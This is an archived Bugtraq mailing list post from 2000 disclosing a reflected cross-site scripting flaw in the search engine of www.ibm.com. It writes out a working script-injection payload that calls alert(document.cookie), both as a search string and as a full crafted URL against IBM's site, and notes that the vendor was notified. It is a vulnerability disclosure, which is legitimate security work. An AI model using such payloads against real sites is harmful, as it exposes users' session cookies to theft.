Bugtraq mailing list archives
Lame cross site scripting against www.ibm.com
From: Georgi Guninski <guninski () GUNINSKI COM>
Date: Mon, 30 Oct 2000 17:59:25 +0200
I know this is really lame issue but guess more sites suffer from it. The search engine at http://www.ibm.com allows cross site scripting. Try searching for: +IBM -</TITLE><SCRIPT>alert(document.cookie)</SCRIPT> or try the following url: http://www.ibm.com/Search?q=%2BIBM+-%3C%2FTITLE%3E%3CSCRIPT%3Ealert%28document.cookie%29%3C%2FSCRIPT%3E&realm=All+of+IBM&v=10&lang=en&cc=us&Go.x=6&Go.y=14 At least it seems not to allow SSI. Vendor status: IBM was notified at least 4 days ago. Regards, Georgi Guninski
Current thread:
- Lame cross site scripting against www.ibm.com Georgi Guninski (Nov 03)